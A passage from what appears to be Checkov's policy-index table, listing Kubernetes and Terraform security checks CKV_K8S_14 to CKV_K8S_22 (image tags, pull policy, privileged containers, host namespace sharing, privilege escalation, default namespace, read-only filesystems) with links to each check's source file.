| Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | -| 2526 | CKV_K8S_14 | resource | kubernetes_pod | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | -| 2527 | CKV_K8S_14 | resource | kubernetes_pod_v1 | Image Tag should be fixed - not latest or blank | Terraform | 
[ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | -| 2528 | CKV_K8S_15 | resource | CronJob | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | -| 2529 | CKV_K8S_15 | resource | DaemonSet | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | -| 2530 | CKV_K8S_15 | resource | Deployment | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | -| 2531 | CKV_K8S_15 | resource | DeploymentConfig | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | -| 2532 | CKV_K8S_15 | resource | Job | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | -| 2533 | CKV_K8S_15 | resource | Pod | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | -| 2534 | CKV_K8S_15 | resource | PodTemplate | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | -| 2535 | CKV_K8S_15 | resource | ReplicaSet | Image Pull Policy should be Always | Kubernetes | 
[ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | -| 2536 | CKV_K8S_15 | resource | ReplicationController | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | -| 2537 | CKV_K8S_15 | resource | StatefulSet | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | -| 2538 | CKV_K8S_15 | resource | kubernetes_deployment | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | -| 2539 | CKV_K8S_15 | resource | kubernetes_deployment_v1 | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | -| 2540 | CKV_K8S_15 | resource | kubernetes_pod | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | -| 2541 | CKV_K8S_15 | resource | kubernetes_pod_v1 | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | -| 2542 | CKV_K8S_16 | resource | CronJob | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | -| 2543 | CKV_K8S_16 | resource | DaemonSet | Container should not be privileged | Kubernetes | 
[PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | -| 2544 | CKV_K8S_16 | resource | Deployment | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | -| 2545 | CKV_K8S_16 | resource | DeploymentConfig | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | -| 2546 | CKV_K8S_16 | resource | Job | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | -| 2547 | CKV_K8S_16 | resource | Pod | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | -| 2548 | CKV_K8S_16 | resource | PodTemplate | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | -| 2549 | CKV_K8S_16 | resource | ReplicaSet | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | -| 2550 | CKV_K8S_16 | resource | ReplicationController | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | -| 2551 | CKV_K8S_16 | resource | StatefulSet | Container should not be privileged | Kubernetes | 
[PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | -| 2552 | CKV_K8S_16 | resource | kubernetes_deployment | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | -| 2553 | CKV_K8S_16 | resource | kubernetes_deployment_v1 | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | -| 2554 | CKV_K8S_16 | resource | kubernetes_pod | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | -| 2555 | CKV_K8S_16 | resource | kubernetes_pod_v1 | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | -| 2556 | CKV_K8S_17 | resource | CronJob | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | -| 2557 | CKV_K8S_17 | resource | DaemonSet | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | -| 2558 | CKV_K8S_17 | resource | Deployment | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | -| 2559 | CKV_K8S_17 | resource | Job | Containers should not share the host process ID namespace | Kubernetes | 
[ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | -| 2560 | CKV_K8S_17 | resource | Pod | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | -| 2561 | CKV_K8S_17 | resource | ReplicaSet | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | -| 2562 | CKV_K8S_17 | resource | ReplicationController | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | -| 2563 | CKV_K8S_17 | resource | StatefulSet | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | -| 2564 | CKV_K8S_17 | resource | kubernetes_deployment | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | -| 2565 | CKV_K8S_17 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | -| 2566 | CKV_K8S_17 | resource | kubernetes_pod | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | -| 2567 | CKV_K8S_17 | resource | kubernetes_pod_v1 | Do not 
admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | -| 2568 | CKV_K8S_18 | resource | CronJob | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | -| 2569 | CKV_K8S_18 | resource | DaemonSet | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | -| 2570 | CKV_K8S_18 | resource | Deployment | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | -| 2571 | CKV_K8S_18 | resource | Job | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | -| 2572 | CKV_K8S_18 | resource | Pod | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | -| 2573 | CKV_K8S_18 | resource | ReplicaSet | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | -| 2574 | CKV_K8S_18 | resource | ReplicationController | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | -| 2575 | CKV_K8S_18 | resource | StatefulSet | Containers should not share the host IPC namespace | Kubernetes | 
[ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | -| 2576 | CKV_K8S_18 | resource | kubernetes_deployment | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | -| 2577 | CKV_K8S_18 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | -| 2578 | CKV_K8S_18 | resource | kubernetes_pod | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | -| 2579 | CKV_K8S_18 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | -| 2580 | CKV_K8S_19 | resource | CronJob | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | -| 2581 | CKV_K8S_19 | resource | DaemonSet | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | -| 2582 | CKV_K8S_19 | resource | Deployment | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | 
-| 2583 | CKV_K8S_19 | resource | Job | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | -| 2584 | CKV_K8S_19 | resource | Pod | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | -| 2585 | CKV_K8S_19 | resource | ReplicaSet | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | -| 2586 | CKV_K8S_19 | resource | ReplicationController | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | -| 2587 | CKV_K8S_19 | resource | StatefulSet | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | -| 2588 | CKV_K8S_19 | resource | kubernetes_deployment | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | -| 2589 | CKV_K8S_19 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | -| 2590 | CKV_K8S_19 | resource | 
kubernetes_pod | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | -| 2591 | CKV_K8S_19 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | -| 2592 | CKV_K8S_20 | resource | CronJob | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | -| 2593 | CKV_K8S_20 | resource | DaemonSet | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | -| 2594 | CKV_K8S_20 | resource | Deployment | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | -| 2595 | CKV_K8S_20 | resource | DeploymentConfig | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | -| 2596 | CKV_K8S_20 | resource | Job | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | -| 2597 | CKV_K8S_20 | resource | Pod | Containers should not run with allowPrivilegeEscalation | Kubernetes 
| [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | -| 2598 | CKV_K8S_20 | resource | PodTemplate | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | -| 2599 | CKV_K8S_20 | resource | ReplicaSet | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | -| 2600 | CKV_K8S_20 | resource | ReplicationController | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | -| 2601 | CKV_K8S_20 | resource | StatefulSet | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | -| 2602 | CKV_K8S_20 | resource | kubernetes_deployment | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | -| 2603 | CKV_K8S_20 | resource | kubernetes_deployment_v1 | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | -| 2604 | CKV_K8S_20 | resource | kubernetes_pod | Containers should not run with allowPrivilegeEscalation | Terraform | 
[AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | -| 2605 | CKV_K8S_20 | resource | kubernetes_pod_v1 | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | -| 2606 | CKV_K8S_21 | resource | ConfigMap | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2607 | CKV_K8S_21 | resource | CronJob | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2608 | CKV_K8S_21 | resource | DaemonSet | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2609 | CKV_K8S_21 | resource | Deployment | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2610 | CKV_K8S_21 | resource | Ingress | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2611 | CKV_K8S_21 | resource | Job | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2612 | CKV_K8S_21 | resource | Pod | The default namespace should not be used | Kubernetes | 
[DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2613 | CKV_K8S_21 | resource | ReplicaSet | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2614 | CKV_K8S_21 | resource | ReplicationController | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2615 | CKV_K8S_21 | resource | Role | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2616 | CKV_K8S_21 | resource | RoleBinding | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2617 | CKV_K8S_21 | resource | Secret | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2618 | CKV_K8S_21 | resource | Service | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2619 | CKV_K8S_21 | resource | ServiceAccount | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2620 | CKV_K8S_21 | resource | StatefulSet | The default namespace should not be used | Kubernetes | 
[DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2621 | CKV_K8S_21 | resource | kubernetes_config_map | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2622 | CKV_K8S_21 | resource | kubernetes_config_map_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2623 | CKV_K8S_21 | resource | kubernetes_cron_job | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2624 | CKV_K8S_21 | resource | kubernetes_cron_job_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2625 | CKV_K8S_21 | resource | kubernetes_daemon_set_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2626 | CKV_K8S_21 | resource | kubernetes_daemonset | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2627 | CKV_K8S_21 | resource | kubernetes_deployment | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2628 | CKV_K8S_21 | resource | kubernetes_deployment_v1 | The default namespace should 
not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2629 | CKV_K8S_21 | resource | kubernetes_ingress | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2630 | CKV_K8S_21 | resource | kubernetes_ingress_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2631 | CKV_K8S_21 | resource | kubernetes_job | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2632 | CKV_K8S_21 | resource | kubernetes_job_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2633 | CKV_K8S_21 | resource | kubernetes_pod | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2634 | CKV_K8S_21 | resource | kubernetes_pod_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2635 | CKV_K8S_21 | resource | kubernetes_replication_controller | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2636 | CKV_K8S_21 | resource | kubernetes_replication_controller_v1 | 
The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2637 | CKV_K8S_21 | resource | kubernetes_role_binding | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2638 | CKV_K8S_21 | resource | kubernetes_role_binding_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2639 | CKV_K8S_21 | resource | kubernetes_secret | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2640 | CKV_K8S_21 | resource | kubernetes_secret_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2641 | CKV_K8S_21 | resource | kubernetes_service | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2642 | CKV_K8S_21 | resource | kubernetes_service_account | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2643 | CKV_K8S_21 | resource | kubernetes_service_account_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2644 | CKV_K8S_21 
| resource | kubernetes_service_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2645 | CKV_K8S_21 | resource | kubernetes_stateful_set | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2646 | CKV_K8S_21 | resource | kubernetes_stateful_set_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2647 | CKV_K8S_22 | resource | CronJob | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | -| 2648 | CKV_K8S_22 | resource | DaemonSet | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | -| 2649 | CKV_K8S_22 | resource | Deployment | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | -| 2650 | CKV_K8S_22 | resource | DeploymentConfig | Use read-only filesystem for containers where possible | Kubernetes | 